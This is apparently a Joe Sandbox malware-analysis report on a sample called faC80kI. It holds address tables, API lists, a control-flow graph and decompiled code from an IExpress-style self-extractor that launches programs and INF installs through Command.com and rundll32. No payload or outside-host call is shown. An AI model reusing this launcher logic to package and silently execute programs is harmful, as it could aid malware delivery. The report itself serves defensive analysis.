                                                                                                                                                                                                                                            0x00a93de1
                                                                                                                                                                                                                                            0x00a93d59
                                                                                                                                                                                                                                            0x00a93d65
                                                                                                                                                                                                                                            0x00a93d6a
                                                                                                                                                                                                                                            0x00a93d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93d6e
                                                                                                                                                                                                                                            0x00a93d75
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93d8f
                                                                                                                                                                                                                                            0x00a93d96
                                                                                                                                                                                                                                            0x00a93d98
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93d98
                                                                                                                                                                                                                                            0x00a93c8f
                                                                                                                                                                                                                                            0x00a93c98
                                                                                                                                                                                                                                            0x00a93cf1
                                                                                                                                                                                                                                            0x00a93cf3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93cfe
                                                                                                                                                                                                                                            0x00a93d11
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93d11
                                                                                                                                                                                                                                            0x00a93c9c
                                                                                                                                                                                                                                            0x00a93ca5
                                                                                                                                                                                                                                            0x00a93ca7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93cad
                                                                                                                                                                                                                                            0x00a93cb2
                                                                                                                                                                                                                                            0x00a93cb7
                                                                                                                                                                                                                                            0x00a93cc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93ce8
                                                                                                                                                                                                                                            0x00a93cec
                                                                                                                                                                                                                                            0x00a93ced
                                                                                                                                                                                                                                            0x00a93ced
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93ce8
                                                                                                                                                                                                                                            0x00a93c9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93c9e
                                                                                                                                                                                                                                            0x00a93c56
                                                                                                                                                                                                                                            0x00a93d35
                                                                                                                                                                                                                                            0x00a93d35
                                                                                                                                                                                                                                            0x00a93d3c
                                                                                                                                                                                                                                            0x00a93d48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93d48
                                                                                                                                                                                                                                            0x00a93c03
                                                                                                                                                                                                                                            0x00a93be2
                                                                                                                                                                                                                                            0x00a93be7
                                                                                                                                                                                                                                            0x00a93bee
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A93C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A93CDC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A98C42), ref: 00A93D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A93E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A98C42), ref: 00A93EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A98C42), ref: 00A93F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A98C42), ref: 00A93F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A98C42), ref: 00A93F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A98C42), ref: 00A93F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A98C42), ref: 00A93F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A98C42), ref: 00A93FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                            • API String ID: 1032054927-2479693719
                                                                                                                                                                                                                                            • Opcode ID: 0b7950036a3a1b10cae858770af1021c59dc079d1b4f4470084e93838ffe0895
                                                                                                                                                                                                                                            • Instruction ID: 329ec58fd67d68a3b081f72a266c866de9e183536ea3b6be266e8ce3fe89edf3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b7950036a3a1b10cae858770af1021c59dc079d1b4f4470084e93838ffe0895
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2B1F472708301ABDF20DF688949B6B77F4EB89740F10092EFA95DA190DB74CD46CB96
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 141 a91ae8-a91b2c call a91680 144 a91b3b-a91b40 141->144 145 a91b2e-a91b39 141->145 146 a91b46-a91b61 call a91a84 144->146 145->146 149 a91b9f-a91bc2 call a91781 call a9658a 146->149 150 a91b63-a91b65 146->150 159 a91bc7-a91bd3 call a966c8 149->159 151 a91b68-a91b6d 150->151 151->151 153 a91b6f-a91b74 151->153 153->149 155 a91b76-a91b7b 153->155 157 a91b7d-a91b81 155->157 158 a91b83-a91b86 155->158 157->158 161 a91b8c-a91b9d call a91680 157->161 158->149 162 a91b88-a91b8a 158->162 165 a91bd9-a91bf1 CompareStringA 159->165 166 a91d73-a91d7f call a966c8 159->166 161->159 162->149 162->161 165->166 168 a91bf7-a91c07 GetFileAttributesA 165->168 175 a91df8-a91e09 LocalAlloc 166->175 176 a91d81-a91d99 CompareStringA 166->176 170 a91c0d-a91c15 168->170 171 a91d53-a91d5e 168->171 170->171 174 a91c1b-a91c33 call a91a84 170->174 173 a91d64-a91d6e call a944b9 171->173 187 a91e94-a91ea4 call a96ce0 173->187 189 a91c50-a91c61 LocalAlloc 174->189 190 a91c35-a91c38 174->190 178 a91e0b-a91e1b GetFileAttributesA 175->178 179 a91dd4-a91ddf 175->179 176->175 181 a91d9b-a91da2 176->181 183 a91e1d-a91e1f 178->183 184 a91e67-a91e73 call a91680 178->184 179->173 186 a91da5-a91daa 181->186 183->184 188 a91e21-a91e3e call a91781 183->188 199 a91e78-a91e84 call a92aac 184->199 186->186 191 a91dac-a91db4 186->191 188->199 210 a91e40-a91e43 188->210 189->179 198 a91c67-a91c72 189->198 195 a91c3a 190->195 196 a91c40-a91c4b call a91a84 190->196 197 a91db7-a91dbc 191->197 195->196 196->189 197->197 203 a91dbe-a91dd2 LocalAlloc 197->203 204 a91c79-a91cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 a91c74 198->205 209 a91e89-a91e92 199->209 203->179 211 a91de1-a91df3 call a9171e 203->211 207 a91cf8-a91d07 204->207 208 a91cc2-a91ccc 204->208 205->204 215 a91d09-a91d21 GetShortPathNameA 207->215 216 a91d23 207->216 212 a91cce 208->212 213 a91cd3-a91cf3 call a91680 * 2 208->213 209->187 210->199 214 a91e45-a91e65 call a916b3 * 2 210->214 211->209 212->213 213->209 214->199 220 a91d28-a91d2b 215->220 216->220 224 a91d2d 220->224 225 a91d32-a91d4e call a9171e 220->225 224->225 225->209
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A91AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t48 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                                                                                            				_v1564 = _a4;
                                                                                                                                                                                                                                            				_v1560 = _a8;
                                                                                                                                                                                                                                            				E00A91680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                            				if(_v528 != 0x22) {
                                                                                                                                                                                                                                            					_t135 = " ";
                                                                                                                                                                                                                                            					_t53 =  &_v528;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t135 = "\"";
                                                                                                                                                                                                                                            					_t53 =  &_v527;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t111 =  &_v1556;
                                                                                                                                                                                                                                            				_v1556 = _t53;
                                                                                                                                                                                                                                            				_t54 = E00A91A84(_t111, _t135);
                                                                                                                                                                                                                                            				_t156 = _v1556;
                                                                                                                                                                                                                                            				_t151 = _t54;
                                                                                                                                                                                                                                            				if(_t156 == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_push(_t111);
                                                                                                                                                                                                                                            					E00A91781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                            					E00A9658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t132 = _t156;
                                                                                                                                                                                                                                            					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t105 =  *_t132;
                                                                                                                                                                                                                                            						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                            					} while (_t105 != 0);
                                                                                                                                                                                                                                            					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                            					if(_t111 < 3) {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t106 = _t156[1];
                                                                                                                                                                                                                                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						E00A91680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t138 = 0x2e;
                                                                                                                                                                                                                                            						_t57 = E00A966C8(_t156, _t138);
                                                                                                                                                                                                                                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            							_t139 = 0x2e;
                                                                                                                                                                                                                                            							_t115 = _t156;
                                                                                                                                                                                                                                            							_t58 = E00A966C8(_t115, _t139);
                                                                                                                                                                                                                                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                            								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            									E00A91680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_push(_t115);
                                                                                                                                                                                                                                            									_t108 = 0x400;
                                                                                                                                                                                                                                            									E00A91781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                            									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                            										E00A916B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                            										E00A916B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = _t156;
                                                                                                                                                                                                                                            								 *_t156 = 0;
                                                                                                                                                                                                                                            								E00A92AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                            								goto L53;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t145 = _t125 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t76 =  *_t125;
                                                                                                                                                                                                                                            									_t125 = _t125 + 1;
                                                                                                                                                                                                                                            								} while (_t76 != 0);
                                                                                                                                                                                                                                            								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                            								_t146 =  &_v268;
                                                                                                                                                                                                                                            								_t157 = _t146 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t77 =  *_t146;
                                                                                                                                                                                                                                            									_t146 = _t146 + 1;
                                                                                                                                                                                                                                            								} while (_t77 != 0);
                                                                                                                                                                                                                                            								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                            								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                            								if(_t156 != 0) {
                                                                                                                                                                                                                                            									E00A9171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                            									goto L53;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L43;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t140 = 0x525;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t60 =  &_v268;
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t140 = "[";
                                                                                                                                                                                                                                            								_v1556 = _t151;
                                                                                                                                                                                                                                            								_t90 = E00A91A84( &_v1556, "[");
                                                                                                                                                                                                                                            								if(_t90 != 0) {
                                                                                                                                                                                                                                            									if( *_t90 != 0) {
                                                                                                                                                                                                                                            										_v1556 = _t90;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "]";
                                                                                                                                                                                                                                            									E00A91A84( &_v1556, "]");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                                            									_t60 = 0;
                                                                                                                                                                                                                                            									_t140 = 0x4b5;
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									_push(0x10);
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                            									_push(_t60);
                                                                                                                                                                                                                                            									E00A944B9(0, _t140);
                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t155 = _v1556;
                                                                                                                                                                                                                                            									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0xa99120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa91140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0xa99a34 =  *0xa99a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0xa99a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E00A9171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0xa99a34 =  *0xa99a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E00A91680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E00A91680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E00A96CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                            0x00a91af3
                                                                                                                                                                                                                                            0x00a91afa
                                                                                                                                                                                                                                            0x00a91b07
                                                                                                                                                                                                                                            0x00a91b09
                                                                                                                                                                                                                                            0x00a91b1a
                                                                                                                                                                                                                                            0x00a91b20
                                                                                                                                                                                                                                            0x00a91b2c
                                                                                                                                                                                                                                            0x00a91b3b
                                                                                                                                                                                                                                            0x00a91b40
                                                                                                                                                                                                                                            0x00a91b2e
                                                                                                                                                                                                                                            0x00a91b2e
                                                                                                                                                                                                                                            0x00a91b33
                                                                                                                                                                                                                                            0x00a91b33
                                                                                                                                                                                                                                            0x00a91b46
                                                                                                                                                                                                                                            0x00a91b4c
                                                                                                                                                                                                                                            0x00a91b52
                                                                                                                                                                                                                                            0x00a91b57
                                                                                                                                                                                                                                            0x00a91b5d
                                                                                                                                                                                                                                            0x00a91b61
                                                                                                                                                                                                                                            0x00a91b9f
                                                                                                                                                                                                                                            0x00a91b9f
                                                                                                                                                                                                                                            0x00a91bb1
                                                                                                                                                                                                                                            0x00a91bc2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91b63
                                                                                                                                                                                                                                            0x00a91b63
                                                                                                                                                                                                                                            0x00a91b65
                                                                                                                                                                                                                                            0x00a91b68
                                                                                                                                                                                                                                            0x00a91b68
                                                                                                                                                                                                                                            0x00a91b6a
                                                                                                                                                                                                                                            0x00a91b6b
                                                                                                                                                                                                                                            0x00a91b6f
                                                                                                                                                                                                                                            0x00a91b74
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91b76
                                                                                                                                                                                                                                            0x00a91b7b
                                                                                                                                                                                                                                            0x00a91b86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91b8c
                                                                                                                                                                                                                                            0x00a91b8c
                                                                                                                                                                                                                                            0x00a91b98
                                                                                                                                                                                                                                            0x00a91bc7
                                                                                                                                                                                                                                            0x00a91bc9
                                                                                                                                                                                                                                            0x00a91bcc
                                                                                                                                                                                                                                            0x00a91bd3
                                                                                                                                                                                                                                            0x00a91d75
                                                                                                                                                                                                                                            0x00a91d76
                                                                                                                                                                                                                                            0x00a91d78
                                                                                                                                                                                                                                            0x00a91d7f
                                                                                                                                                                                                                                            0x00a91e05
                                                                                                                                                                                                                                            0x00a91e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91e12
                                                                                                                                                                                                                                            0x00a91e1b
                                                                                                                                                                                                                                            0x00a91e73
                                                                                                                                                                                                                                            0x00a91e21
                                                                                                                                                                                                                                            0x00a91e21
                                                                                                                                                                                                                                            0x00a91e28
                                                                                                                                                                                                                                            0x00a91e37
                                                                                                                                                                                                                                            0x00a91e3e
                                                                                                                                                                                                                                            0x00a91e52
                                                                                                                                                                                                                                            0x00a91e60
                                                                                                                                                                                                                                            0x00a91e60
                                                                                                                                                                                                                                            0x00a91e3e
                                                                                                                                                                                                                                            0x00a91e79
                                                                                                                                                                                                                                            0x00a91e7b
                                                                                                                                                                                                                                            0x00a91e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91d9b
                                                                                                                                                                                                                                            0x00a91d9b
                                                                                                                                                                                                                                            0x00a91da0
                                                                                                                                                                                                                                            0x00a91da2
                                                                                                                                                                                                                                            0x00a91da5
                                                                                                                                                                                                                                            0x00a91da5
                                                                                                                                                                                                                                            0x00a91da7
                                                                                                                                                                                                                                            0x00a91da8
                                                                                                                                                                                                                                            0x00a91dac
                                                                                                                                                                                                                                            0x00a91dae
                                                                                                                                                                                                                                            0x00a91db4
                                                                                                                                                                                                                                            0x00a91db7
                                                                                                                                                                                                                                            0x00a91db7
                                                                                                                                                                                                                                            0x00a91db9
                                                                                                                                                                                                                                            0x00a91dba
                                                                                                                                                                                                                                            0x00a91dbe
                                                                                                                                                                                                                                            0x00a91dc3
                                                                                                                                                                                                                                            0x00a91dce
                                                                                                                                                                                                                                            0x00a91dd2
                                                                                                                                                                                                                                            0x00a91deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91dd2
                                                                                                                                                                                                                                            0x00a91bf7
                                                                                                                                                                                                                                            0x00a91bfe
                                                                                                                                                                                                                                            0x00a91c07
                                                                                                                                                                                                                                            0x00a91d55
                                                                                                                                                                                                                                            0x00a91d5a
                                                                                                                                                                                                                                            0x00a91d5b
                                                                                                                                                                                                                                            0x00a91d5d
                                                                                                                                                                                                                                            0x00a91d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91c1b
                                                                                                                                                                                                                                            0x00a91c1b
                                                                                                                                                                                                                                            0x00a91c20
                                                                                                                                                                                                                                            0x00a91c2c
                                                                                                                                                                                                                                            0x00a91c33
                                                                                                                                                                                                                                            0x00a91c38
                                                                                                                                                                                                                                            0x00a91c3a
                                                                                                                                                                                                                                            0x00a91c3a
                                                                                                                                                                                                                                            0x00a91c40
                                                                                                                                                                                                                                            0x00a91c4b
                                                                                                                                                                                                                                            0x00a91c4b
                                                                                                                                                                                                                                            0x00a91c5d
                                                                                                                                                                                                                                            0x00a91c61
                                                                                                                                                                                                                                            0x00a91dd4
                                                                                                                                                                                                                                            0x00a91dd4
                                                                                                                                                                                                                                            0x00a91dd6
                                                                                                                                                                                                                                            0x00a91ddb
                                                                                                                                                                                                                                            0x00a91ddc
                                                                                                                                                                                                                                            0x00a91dde
                                                                                                                                                                                                                                            0x00a91d64
                                                                                                                                                                                                                                            0x00a91d64
                                                                                                                                                                                                                                            0x00a91d67
                                                                                                                                                                                                                                            0x00a91d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91c67
                                                                                                                                                                                                                                            0x00a91c67
                                                                                                                                                                                                                                            0x00a91c6d
                                                                                                                                                                                                                                            0x00a91c72
                                                                                                                                                                                                                                            0x00a91c74
                                                                                                                                                                                                                                            0x00a91c74
                                                                                                                                                                                                                                            0x00a91c8e
                                                                                                                                                                                                                                            0x00a91c99
                                                                                                                                                                                                                                            0x00a91cc0
                                                                                                                                                                                                                                            0x00a91cf8
                                                                                                                                                                                                                                            0x00a91d07
                                                                                                                                                                                                                                            0x00a91d23
                                                                                                                                                                                                                                            0x00a91d09
                                                                                                                                                                                                                                            0x00a91d14
                                                                                                                                                                                                                                            0x00a91d1b
                                                                                                                                                                                                                                            0x00a91d1b
                                                                                                                                                                                                                                            0x00a91d2b
                                                                                                                                                                                                                                            0x00a91d2d
                                                                                                                                                                                                                                            0x00a91d2d
                                                                                                                                                                                                                                            0x00a91d38
                                                                                                                                                                                                                                            0x00a91d39
                                                                                                                                                                                                                                            0x00a91d46
                                                                                                                                                                                                                                            0x00a91cc2
                                                                                                                                                                                                                                            0x00a91cc2
                                                                                                                                                                                                                                            0x00a91ccc
                                                                                                                                                                                                                                            0x00a91cce
                                                                                                                                                                                                                                            0x00a91cce
                                                                                                                                                                                                                                            0x00a91cdb
                                                                                                                                                                                                                                            0x00a91ce6
                                                                                                                                                                                                                                            0x00a91cee
                                                                                                                                                                                                                                            0x00a91cee
